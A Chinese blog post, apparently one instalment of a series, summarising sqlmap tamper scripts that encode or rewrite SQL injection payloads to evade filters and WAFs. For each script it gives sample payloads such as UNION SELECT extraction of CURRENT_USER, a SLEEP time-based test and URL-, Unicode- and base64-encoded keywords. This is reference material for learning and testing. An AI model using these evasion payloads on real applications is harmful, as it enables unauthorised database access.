记一份SQLmap使用手册小结(一) (9)

示例:

1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))# 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#

版本要求:

MySQL >= 5.1.13

2:securesphere.py

作用:追加特制的字符串

示例:

'1 AND 1=1' "1 AND 1=1 and '0having'='0having'"

在以下版本做过测试:

All

3:charunicodeencode.py

作用:字符串 unicode 编码

示例:

SELECT FIELD%20FROM TABLE %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′

版本要求:

ASP ASP.NET 在以下版本做过测试: Microsoft SQL Server 2000 Microsoft SQL Server 2005 MySQL 5.1.56 PostgreSQL 9.0.3

4:charencode.py

作用:url编码

示例:

SELECT FIELD FROM%20TABLE %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

在以下版本做过测试:

Microsoft SQL Server 2005 MySQL 4, 5.0 and 5.5 Oracle 10g PostgreSQL 8.3, 8.4, 9.0

5:appendnullbyte.py

作用:在有效负荷结束位置加载零字节字符编码

‘1 AND 1=1’ ‘1 AND 1=1%00’

版本要求:

Microsoft Access

6:chardoubleencode.py

作用: 双url编码(不处理以编码的)

示例:

SELECT FIELD FROM%20TABLE %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

7:base64encode.py

作用:用base64编码替换

示例:

"1' AND SLEEP(5)#" 'MScgQU5EIFNMRUVQKDUpIw=='

版本要求:

all

8:nonrecursivereplacement.py

作用:双重查询语句。取代predefined SQL关键字with表示 suitable for替代(例如 .replace(“SELECT”、””)) filters

示例:

'1 UNION SELECT 2--' '1 UNIOUNIONN SELESELECTCT 2--'

在以下版本做过测试:

all

后续内容将会继续更新。。。。。。。。。

参考资料:

安全牛课堂-kali-linux-web篇

sqlmap用户手册中文版:https://octobug.gitbooks.io/sqlmap-wiki-zhcn/content/Users-manual/Introduction.html

sqlmap用户手册:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wpjfgx.html